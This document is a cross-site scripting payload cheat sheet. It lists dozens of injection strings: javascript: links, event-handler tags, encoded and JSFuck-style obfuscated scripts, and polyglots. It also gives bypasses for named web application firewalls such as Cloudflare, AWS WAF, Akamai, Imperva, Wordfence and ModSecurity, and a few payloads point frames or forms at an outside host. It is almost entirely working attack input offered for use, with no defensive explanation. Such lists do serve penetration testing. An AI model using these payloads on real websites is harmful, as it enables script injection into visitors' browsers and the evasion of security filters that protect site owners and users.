Try to use this payloads :
1) <a href="javascript:alert(1)">Click</a>
2) <a href="javascript:alert(1)">Click</a>
3) <a href="javascript:{ alert`0` }">Click</a>
4) <a src="google.com" onclick="alert(1)">Click</a>
Or try to replace " with \u0022, > with \u003e and < with \u003c. So the payload will be:
4) \u0022\u003e\u003cimg src=x onerror=alert(1)\u003e\u003cx y=\u0022
Try to event handlers :
1) <input value"XXXXXXX" onclick=alert(1) >Click</input>
2) <input type:"text" value="XSS" accesskey="x" onclick="alert(1)" >
3) <img src=x onerror="javascript:alert('XSS')">
4) </div><a src="google.com" href="javaSCRIPT:alert(/xss/)">XSS</a>
5) <a href=https://google.com onclick=alert(document.location.hash.substring(1))#{saasasasas}>Click</a>
or use encodes:
use Unicodes - UTF8 - UTF16 - UTF32
%3cscript%3e
%253cscript%253e
<script>
%u003Csvg onload=alert(1)>
%u3008svg onload=alert(2)>
%uFF1Csvg onload=alert(3)>
Burp Suite > Convert Selection > HTML > HTML-encode all character
<a href="javascript:alert(1)">Click</a> =
<a href="javascript:alert(1)">Click</a>
Try to use this payloads :
1) <script>$='',_=!$+$,$$=!_+$,$_=$+{},_$=_[$++],__=_[_$$=$],_$_=++_$$+$,$$$=$_[_$$+_$_],_[$$$+=$_[$]+(_.$$+$_)[$]+$$[_$_]+_$+__+_[_$$]+$$$+_$+$_[$]+__][$$$]($$[$]+$$[_$$]+_[_$_]+__+_$+"($)")()</script>
2) <script>[[,$,_,$$,__,$_,_$,$$$,$__,,___]=[![]+[]+!![]][+[]]+[][[]]],$$_=[][$+$_],[,,,$_$,,,_$$,,,,,__$,_$_]=[...$$_+[]],$_$+_$$+___+$$+$_+_$+$$$+$_$+$_+_$$+_$$$_[$_$+_$$+___+$$+$_+_$+$$$+$_$+$_+_$$+_$]($+_+__+_$+$_+__$+[+!!$]+_$_)()</script>
3) <script>([,O,B,J,E,C,,]=[]+{},[T,R,U,E,F,A,L,S,,,N]=[!!O]+!O+B.E)[X=C+O+N+S+T+R+U+C+T+O+R][X](A+L+E+R+T+`(1)`)()</script>
4) <html>
<body>
<head>
<meta charset="utf-8">
</head>
<script>
ᐁ='',ᐃ=!ᐁ+ᐁ,ᐅ=!ᐃ+ᐁ
ᐊ=ᐁ+{},ᐄ=ᐃ[ᐁ++],ᐆ=
ᐃ[ᐋ=ᐁ],ᐒ=++ᐋ+ᐁ,ᐗ
=ᐊ[ᐋ+ᐒ],ᐃ[ᐗ+=ᐊ[ᐁ]
+(ᐃ.ᐅ+ᐊ)[ᐁ]+ᐅ[ᐒ]+ᐄ
+ᐆ+ᐃ[ᐋ]+ᐗ+ᐄ+ᐊ[ᐁ]
+ᐆ][ᐗ](ᐅ[ᐁ]+ᐅ[ᐋ]+ᐃ
[ᐒ]+ᐆ+ᐄ+"`ᐁᐃ`")()
</script>
</html>
</body>
5) <script>prompt(1)</script>
6) <a"/onclick=(confirm)()>Click Here!
7) <script>/&/-alert(1)</script>
<script>/&/-alert(1)</script>
8) %00%00%00%00%00%00%00<script>alert(1)</script> (1.Null bytes are output 2.There is no space character immediately before)
9) <sVg OnPointerEnter="location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`">
10) <bleh/onclick=top[/al/.source+/ert/.source]	``>click
11) <script>alert.call(null,1)</script> (alert.call(%20, "XSS");)
12) <script>confirm.call(null,1)</script>
13) <script>prompt.call(null,1)</script>
14) <script>alert.apply(null, [1])</script>
15) <iframe src=//14.rs>
16) <form><button formaction=http://14.rs>Hacked</form>
use tab url encode : %09
<input%09value"XXXXXXX"%09onclick=alert(1)>Click</input>
<script>alert`1`</script>
SVG, img, iframe
@vanshitmalhotra | Bypass AWS WAF -//
Add "<!" (without quotes) before your payload and bypass that WAF. :)
eg: <!<script>confirm(1)</script>
@black0x00mamba | Bypass WAF Akamaighost & filtered onload, onclick, href, src, onerror, script, etc
<img sr%00c=x o%00nerror=((pro%00mpt(1)))>
DotDefender WAF bypass by @0xInfection
<bleh/ondragstart=	parent	['open']	()%20draggable=True>dragme
@LooseSecurity | Updated CloudFlare bypass (bypasses virtually all WAF you'll encounter in the wild):
<iframe/src='%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A:prompt`1`'>
Javascript URI cushioned between carriage returns with a non-bracketed prompt.
@daveysec | Was able to bypass Imperva Incapsula WAF with:
<svg onload\r\n=$.globalEval("al"+"ert()");>
@rodolfoassis | Wordfence 7.4.2
<a href=javascript:alert(1)>
rodolfoassis | Sucuri CloudProxy (POST only)
<a href=javascript:confirm(1)>
rodolfoassis | ModSecurity CRS 3.2.0 PL1
<a href="jav%0Dascript:alert(1)">
@brutelogic | Cloudflare
<Svg Only=1 OnLoad=alert(1)>
<script>{onerror=alert}throw 1</script> -->
<script>eval.call`${'alert\x2823\x29'}`</script>
<img src=x onerror=this.innerHTML=String.fromCharCode(60,105,109,103,32,115,114,99,61,39,120,39,32,111,110,101,114,114,111,114,61,39,97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41,59,39,62)
### 7.Some good stuffs:
https://github.com/Walidhossain010/WAF-bypass-xss-payloads
https://aswingovind.medium.com/content-spoofing-yes-html-injection-39611d9a4057
7.XSS PolyglotsPolice: revolving allow you to test multiple XSS scenarios with ONE payload. Work smarter not harder:
-->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``>
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e